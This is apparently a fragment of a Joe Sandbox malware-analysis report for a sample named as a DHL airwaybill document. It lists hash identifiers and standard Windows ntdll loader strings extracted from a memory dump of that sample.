                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: FilterFullPath$UseFilter$\??\
                • API String ID: 0-2779062949
                • Opcode ID: 9ab0a5b4f1b4ba3f69ed9e9d8d6a765315823a5f74f4f937141c1a1c590edee7
                • Instruction ID: d140f4a2e4c4ac3b8003f1cf6df3b214dfabf37ce046fdf88709a0dfaeb3f06f
                • Opcode Fuzzy Hash: 9ab0a5b4f1b4ba3f69ed9e9d8d6a765315823a5f74f4f937141c1a1c590edee7
                • Instruction Fuzzy Hash: 14A18B359016299BDF75DF68CC88BEABBB9EF44700F0041E9EA09A7210D7359E84CF50
                Strings
                • LdrpCheckModule, xrefs: 01B6A117
                • minkernel\ntdll\ldrinit.c, xrefs: 01B6A121
                • Failed to allocated memory for shimmed module list, xrefs: 01B6A10F
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                • API String ID: 0-161242083
                • Opcode ID: 300275f8b89cb179b2f51d20e4b4f55f54f2c7a59fb7f5eeb8ab367b4cb26dc5
                • Instruction ID: 65195ccecdaef191409db519273ffe11e0f91bd20292f2884a05f11123a7cce5
                • Opcode Fuzzy Hash: 300275f8b89cb179b2f51d20e4b4f55f54f2c7a59fb7f5eeb8ab367b4cb26dc5
                • Instruction Fuzzy Hash: 4C71CEB5A00205DFDF2DEF68C984AAEB7F8FB48704F1440ADE906EB255E734A945CB50
                Strings
                • Failed to reallocate the system dirs string !, xrefs: 01B782D7
                • minkernel\ntdll\ldrinit.c, xrefs: 01B782E8
                • LdrpInitializePerUserWindowsDirectory, xrefs: 01B782DE
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                • API String ID: 0-1783798831
                • Opcode ID: 507bb28ae941a68acf53343f8e9f850f7afbd5c13f0643c50273440f479b8b1e
                • Instruction ID: d479f47dbfb2f2759c22c618341d4f14b82e83a1232b42911790feddfbb98a46
                • Opcode Fuzzy Hash: 507bb28ae941a68acf53343f8e9f850f7afbd5c13f0643c50273440f479b8b1e
                • Instruction Fuzzy Hash: F041D071544301EBDB2AEBA8D844B5B7BE8EF84750F1049AEFD58E3254EB70E810CB91
                Strings
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01BBC1C5
                • PreferredUILanguages, xrefs: 01BBC212
                • @, xrefs: 01BBC1F1
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                • API String ID: 0-2968386058
                • Opcode ID: ca7da432e5b5d125a973203c0dc91f045d1bcc01408df696966bb525b254dbb9
                • Instruction ID: d7d21c3da36da868452d92b74b36e36b02cc1c92cd95e7f6f12b77e3f989a5d2
                • Opcode Fuzzy Hash: ca7da432e5b5d125a973203c0dc91f045d1bcc01408df696966bb525b254dbb9
                • Instruction Fuzzy Hash: 90415371E00219EBEF19DFD8C891FEEBBB8EB14700F1441AAE609F7640D7B49A459B50
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                • API String ID: 0-1373925480
                • Opcode ID: 737a469307e137be5f7659c67f9fcdad4c54986bceda15eb1ed521dbcc1a988b
                • Instruction ID: 7401946f34ebc6b313aadb48d4bc879b9d58828eb9c7539395d16e09afe715df
                • Opcode Fuzzy Hash: 737a469307e137be5f7659c67f9fcdad4c54986bceda15eb1ed521dbcc1a988b
                • Instruction Fuzzy Hash: B741F471A102588BEF2ADBD9CA44BADBBF5FF55340F1505E9D901AB391E7348903CB10
                Strings
                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B84888
                • minkernel\ntdll\ldrredirect.c, xrefs: 01B84899
                • LdrpCheckRedirection, xrefs: 01B8488F
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                • API String ID: 0-3154609507
                • Opcode ID: 85efad4dc6acf398fa8d3c745c61c078de1f988ec72fc10189bfac54605f623d
                • Instruction ID: e6871ba619ed68d6e87b79a57d0cce7382cc13792eb82b5a972813520d9575b7
                • Opcode Fuzzy Hash: 85efad4dc6acf398fa8d3c745c61c078de1f988ec72fc10189bfac54605f623d
                • Instruction Fuzzy Hash: 9641CF36A146529BCB29FE6DD840B267BE4FF49E50F0606EDED49A7215E730E800CB91
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-2558761708
                • Opcode ID: e33848ef8ea73acdf59bcbd52d9b2227f4327b7655f171d3e2ff0e062b15216a
                • Instruction ID: a8a08ef1b559f84c0a69dc11f85afe1ec1b05fb77b553ebee87140b9dc3a5ddb
                • Opcode Fuzzy Hash: e33848ef8ea73acdf59bcbd52d9b2227f4327b7655f171d3e2ff0e062b15216a
                • Instruction Fuzzy Hash: B111E1313151029FDB2DEB18C480B76B3A8FF50A59F1982EDF406CB259DB38D890C750
                Strings
                • LdrpInitializationFailure, xrefs: 01B820FA
                • minkernel\ntdll\ldrinit.c, xrefs: 01B82104
                • Process initialization failed with status 0x%08lx, xrefs: 01B820F3
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2986994758
                • Opcode ID: d69bf3c0e111fd7fcf03eeba713cda0cb2637aa866ae9ae10bf562e8e31139d3
                • Instruction ID: bf0720abfdc44bb951bbedd8bbce9f3d9700487ccaf0af62d027e02195b8d045
                • Opcode Fuzzy Hash: d69bf3c0e111fd7fcf03eeba713cda0cb2637aa866ae9ae10bf562e8e31139d3
                • Instruction Fuzzy Hash: 65F0C275640308BBEB28FA4DCC46F993BACFB40F54F2400D9F600A7681D7B0A940C791
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: #%u
                • API String ID: 48624451-232158463
                • Opcode ID: 78cda72d431c325dbd5335763a0a77c7ecd3ad0a16f04d652d0f5155603e069f
                • Instruction ID: 6c9d7639e1e455d19ad35e864eae7a725282bb773a9b6ce727c574a6037f96f6
                • Opcode Fuzzy Hash: 78cda72d431c325dbd5335763a0a77c7ecd3ad0a16f04d652d0f5155603e069f
                • Instruction Fuzzy Hash: 37714971A0054A9FDB09EFA8C990BAEB7F8FF18704F1540A5E905E7255EB38ED41CB60
                Strings
                • LdrResSearchResource Enter, xrefs: 01B0AA13
                • LdrResSearchResource Exit, xrefs: 01B0AA25
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                • API String ID: 0-4066393604
                • Opcode ID: bb80bd5516f9dfb9239475f9aab8e457fafb612db98051047bff8f3526e0230a
                • Instruction ID: d32689ccf6565e747ec4b58d0fc777eeceab7dff7bde967e413a8270eac7e48c
                • Opcode Fuzzy Hash: bb80bd5516f9dfb9239475f9aab8e457fafb612db98051047bff8f3526e0230a
                • Instruction Fuzzy Hash: ECE18471E007199BEF2ADEA9C980BAEBFB9FF54310F1049A5E901E72D1D7389941CB50
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: `$`
                • API String ID: 0-197956300
                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction ID: 4501b8179fc88275ab13895d6d0ff06608fadb1a81a18a26247ef9220e988a90
                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction Fuzzy Hash: E4C1B03120434A9BEB29CF28C841B6BBBE5FFD4B18F084A6DF69687290E774D505CB51
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Legacy$UEFI
                • API String ID: 2994545307-634100481
                • Opcode ID: d349fdda62ad7ab03b856319f38e071e1f4a85c6be1c41412996a1ab4ad6d8d1
                • Instruction ID: 1c44f7f3b202e5142b43b39b2509292dd17eb127c64942b8b7bf4fa747bc6e9d
                • Opcode Fuzzy Hash: d349fdda62ad7ab03b856319f38e071e1f4a85c6be1c41412996a1ab4ad6d8d1
                • Instruction Fuzzy Hash: 9A613C71E006199FDB29DFA8C840BAEBBB9FF48700F1441ADE659EB291D731E940DB50
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$MUI
                • API String ID: 0-17815947
                • Opcode ID: e9a45f9822e79ceb4296033dcd5be78a190c4978df1b7202ceb88c1e15ae16cb
                • Instruction ID: 9aa19214a007eefbb6a24aee4a4a307f90542c65d10fb0c0433dee0e7eb5477a
                • Opcode Fuzzy Hash: e9a45f9822e79ceb4296033dcd5be78a190c4978df1b7202ceb88c1e15ae16cb
                • Instruction Fuzzy Hash: 6B514971E0021DAFDF15DFA9CC80AEEBBB8EB04754F5445A9E611B7290DB709D05CB60
                Strings
                • kLsE, xrefs: 01B00540
                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01B0063D
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                • API String ID: 0-2547482624
                • Opcode ID: 48103faacd537e6831f336859d554835c7fa27d19eb7ec324052f70d4fe44040
                • Instruction ID: 91f51efa4236e47b957e8852c88262b50d1b74dc85ba7bc779c729993cbc05b1
                • Opcode Fuzzy Hash: 48103faacd537e6831f336859d554835c7fa27d19eb7ec324052f70d4fe44040
                • Instruction Fuzzy Hash: 7351C0715047429FD72AEF28C8807A7BBE5EF84340F10887EFA9A87281E770D545CB91
                Strings
                • RtlpResUltimateFallbackInfo Enter, xrefs: 01B0A2FB
                • RtlpResUltimateFallbackInfo Exit, xrefs: 01B0A309
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                • API String ID: 0-2876891731
                • Opcode ID: fbe62b39853e481c9eb0fc49eeb8ea67991f8d6b5c8aa1461ba0cbc49c4ff61e
                • Instruction ID: 941302713545a05e60c0582c3b543ab04eb77d1f3b982aab63e00acd52c25c50
                • Opcode Fuzzy Hash: fbe62b39853e481c9eb0fc49eeb8ea67991f8d6b5c8aa1461ba0cbc49c4ff61e
                • Instruction Fuzzy Hash: 1E41B030A04745DBEB1ADF69C880B6D7BB4FF95700F1845E9E900DB2A1E7B9D900CB50
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Cleanup Group$Threadpool!
                • API String ID: 2994545307-4008356553
                • Opcode ID: 18ede72f0a71bf0368f77e6e8c094fe95d5c6a29fba4f743413b5ae7cad187bd
                • Instruction ID: abb280378c805ccae6c582c4b81e4562e3b63f17982fa7aa109ecc0393eddf66
                • Opcode Fuzzy Hash: 18ede72f0a71bf0368f77e6e8c094fe95d5c6a29fba4f743413b5ae7cad187bd
                • Instruction Fuzzy Hash: E701D1B2640B00AFD311DF24CD45B1677E8F784B15F0189B9B688C7190E334D814DB46
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: MUI
                • API String ID: 0-1339004836
                • Opcode ID: 7728ebe607c89a730f5ff28ce882f8b2fc16d9c83b47f9af85a7cc85452fcae6
                • Instruction ID: 186c916cb4c7d88e2cf6bb88682be1528516ade64257b3b638426f8aa2196233
                • Opcode Fuzzy Hash: 7728ebe607c89a730f5ff28ce882f8b2fc16d9c83b47f9af85a7cc85452fcae6
                • Instruction Fuzzy Hash: F7823F75D002199BEB2ACFA9C8807EDBFB1FF48350F1482E9D959AB2D1D7309945CB50
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: GlobalTags
                • API String ID: 0-1106856819
                • Opcode ID: aa582ac72dfe3bced74b40172c525ad9010be171deacf495bd903d88b5eb9708
                • Instruction ID: 9f9563a0589b3c6bc1c06d6f28dbba8ffbe34367fe24d9983978d49779804d4c
                • Opcode Fuzzy Hash: aa582ac72dfe3bced74b40172c525ad9010be171deacf495bd903d88b5eb9708
                • Instruction Fuzzy Hash: 40717CB5E0060A8FEF2CCF9CC490AADBBB1FF98740F1481AEE815A7241E7319901CB50
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: .mui
                • API String ID: 0-1199573805
                • Opcode ID: 1a071c32972dc484a9cf80947321d6bef10fecf3f1d294bcba80e1ca5164d0b0
                • Instruction ID: 4d3a0e6cb94ea2f98696bca78f93533555b6837e3a03daa95a1733bc5f067f7e
                • Opcode Fuzzy Hash: 1a071c32972dc484a9cf80947321d6bef10fecf3f1d294bcba80e1ca5164d0b0
                • Instruction Fuzzy Hash: 7E51C672D052299BDF19DF99D840AAEBBB4FF05B10F4941AAEA11B7250D7B48C01CBE0
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: EXT-
                • API String ID: 0-1948896318
                • Opcode ID: 03260f720e3a18314f8704790bb3ea4e3defcb9804f2e7699430ed43f3c61620
                • Instruction ID: 586d241ee4a11427cd9a58c382d8a4e3a42a94f0d1058c0cbf2f7a00e6bf40f7
                • Opcode Fuzzy Hash: 03260f720e3a18314f8704790bb3ea4e3defcb9804f2e7699430ed43f3c61620
                • Instruction Fuzzy Hash: FF41A5725043129BE71ADB75C840B6BBBE8EF88714F850AADF944D7144E774D904C793
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: BinaryHash
                • API String ID: 0-2202222882
                • Opcode ID: 8a841c98d273e3282bc22901fdbab263a4071b8484485249d60e5e055807a051
                • Instruction ID: 01c9c6029d3ccae68b057232cd4edcb0ed97635acedb7f65e7d6f32890a031bd
                • Opcode Fuzzy Hash: 8a841c98d273e3282bc22901fdbab263a4071b8484485249d60e5e055807a051
                • Instruction Fuzzy Hash: 9C4167B1D0052EABDF25DA50DC84FEEBB7CAB44714F0045E9EB18A7140DB309E488F94
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: #
                • API String ID: 0-1885708031
                • Opcode ID: 4f7ccfce697dd46fb9661870c4c927089dd514ffa2b75a816e362687fbc43f4e
                • Instruction ID: 16da848fdd4bd0d6aaea91bb5b95070aadd808107c0dcd8aeb6ee440c8c23b08
                • Opcode Fuzzy Hash: 4f7ccfce697dd46fb9661870c4c927089dd514ffa2b75a816e362687fbc43f4e
                • Instruction Fuzzy Hash: 9A311631A047999BEF2ADB69C850FAE7BB8DF05704F1440B8F940AB282D775E806CB50
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: BinaryName
                • API String ID: 0-215506332
                • Opcode ID: b18e2fee368a3627a26e336a9d1d5b3fec581340516308a54a6f4dbb0368d9a9
                • Instruction ID: 6c6a366e7685d4f8fdedfb3649ccf6e84201b457fb95a8d2a6ed9983d87fd09e
                • Opcode Fuzzy Hash: b18e2fee368a3627a26e336a9d1d5b3fec581340516308a54a6f4dbb0368d9a9
                • Instruction Fuzzy Hash: 7E31BF3690051AAFEB19DA59D845E7BBEB4EB80720F1181ADB925A7350D7309E04EBE0
                Strings
                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01B8895E
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                • API String ID: 0-702105204
                • Opcode ID: a80f4d2c98b1ef6d26b4def72e40f763e841fc166839cfb671736bc471af91ce
                • Instruction ID: 2d910648a1cd91915056ac048273a44dd74fc101c0b84e647e28ad7b6bc9a882
                • Opcode Fuzzy Hash: a80f4d2c98b1ef6d26b4def72e40f763e841fc166839cfb671736bc471af91ce
                • Instruction Fuzzy Hash: 3D012636300201ABEA3D7B5ADC84B6A7F69EF85A94B4425ECF74157552CB20A844C792
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eec2d196f1ca54e4077e30a365c5d7c3a13a29427c7131e5b58f6aa33156fdfa
                • Instruction ID: 6293b12a5e6fec8ef5fe1108113e1a4469dae1f71d3e6b833d314f30a3a5178a
                • Opcode Fuzzy Hash: eec2d196f1ca54e4077e30a365c5d7c3a13a29427c7131e5b58f6aa33156fdfa
                • Instruction Fuzzy Hash: 52C169705083418FD769CF19C494BABBBE8FF98304F4449ADE98987291D775EA08CF92
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 93dc784bf7c3a369b8a5bad554c9b2f40a38bbcd75baf6bfd9cca927e475bbc9
                • Instruction ID: a8cbeae752ed040a56bd76ad040edb65908cbb6f7ea7c098ad197acb1344453b
                • Opcode Fuzzy Hash: 93dc784bf7c3a369b8a5bad554c9b2f40a38bbcd75baf6bfd9cca927e475bbc9
                • Instruction Fuzzy Hash: CBB18270A002698BDB78DF69C890BA9B7F1EF44750F0485EDE64AE7245EB70DD85CB20
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4e17c842040acf8c77024b1b80550307201c78720961998f25d45eab1bcd256c
                • Instruction ID: 3f49adc915458da2a6ed1092e87e3f5b4bdea80645cd69cd310fbd295b67c435
                • Opcode Fuzzy Hash: 4e17c842040acf8c77024b1b80550307201c78720961998f25d45eab1bcd256c
                • Instruction Fuzzy Hash: D8A13731E00625AFEF3ADB59D854BBDBBB8EB00714F0502D9EA14AB290D778DD44CB91
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 90e58650880a73924431ff9404c56295eae9cdb5fc28787f652ade8686004d00
                • Instruction ID: 825b8582950e1744b4bb3464db59d0b11ae224a28f285adb7f4f2351934e02e4
                • Opcode Fuzzy Hash: 90e58650880a73924431ff9404c56295eae9cdb5fc28787f652ade8686004d00
                • Instruction Fuzzy Hash: 51A1D370B006169FDB2DEF69C990BAAB7B1FF44314F0081A9FB5597281DB34E811EB50
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9220ed017d8827c6be1798fe4289022ee2e40fbee86af23e367074928950e1e9
                • Instruction ID: f962eea22821cde547d197112e3225826d512fff550c5b88518b4c3cc69762c7
                • Opcode Fuzzy Hash: 9220ed017d8827c6be1798fe4289022ee2e40fbee86af23e367074928950e1e9
                • Instruction Fuzzy Hash: 51A1CE72A00652EFCB2DDF18C980B5ABBE9FF48744F4505ACF5459BA55E335E800CB91
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                • Instruction ID: 320e56534fd1bae3fe49cd54c60af8376b0a9877cb5c8428dc273f236128ff95
                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                • Instruction Fuzzy Hash: 9DB12871E0065ADFDF2DCFA9C880AADBBB5FF48310F1481A9E915A7354E730A945CB90
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5e22c7f1fd8682ec9292bb9bf662183ee5ccd4484fd86e95962e725782280cfe
                • Instruction ID: c238493bdac1dd02bcbc2a3014606cafd710a279206e5b7a48756860b6504a7c
                • Opcode Fuzzy Hash: 5e22c7f1fd8682ec9292bb9bf662183ee5ccd4484fd86e95962e725782280cfe
                • Instruction Fuzzy Hash: 1F918071D00216AFDF19EFA9D884BAEBFB5EB49B10F1541A9E610EB351D734D900CBA0
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7743b89d611d6b1320d6721952630b394e9a6686c53b7a03a2375bbca7ff226d
                • Instruction ID: c665b13e2a67758e7f32f2bbad8fae78ba70f16c886f181c29f06b44d7830a2d
                • Opcode Fuzzy Hash: 7743b89d611d6b1320d6721952630b394e9a6686c53b7a03a2375bbca7ff226d
                • Instruction Fuzzy Hash: C7914731A00212DFEB2DDB58C480BBDBBA5EFA4714F4681E9ED059B388E738D901C751
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 010dac52bb26009b12ccfa3e0b3aa2fefabd32d4d54db5f8e62ecc3aa09a48e1
                • Instruction ID: 69c0b961cf210ad42c7a5c739a7c9393cac65530884baf5e59f7a6c0ad9aaf30
                • Opcode Fuzzy Hash: 010dac52bb26009b12ccfa3e0b3aa2fefabd32d4d54db5f8e62ecc3aa09a48e1
                • Instruction Fuzzy Hash: 5681B4B1E0061A9BDB68CF69C840BBEBBF9FB48700F44856EE945D7640E334D941CBA4
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
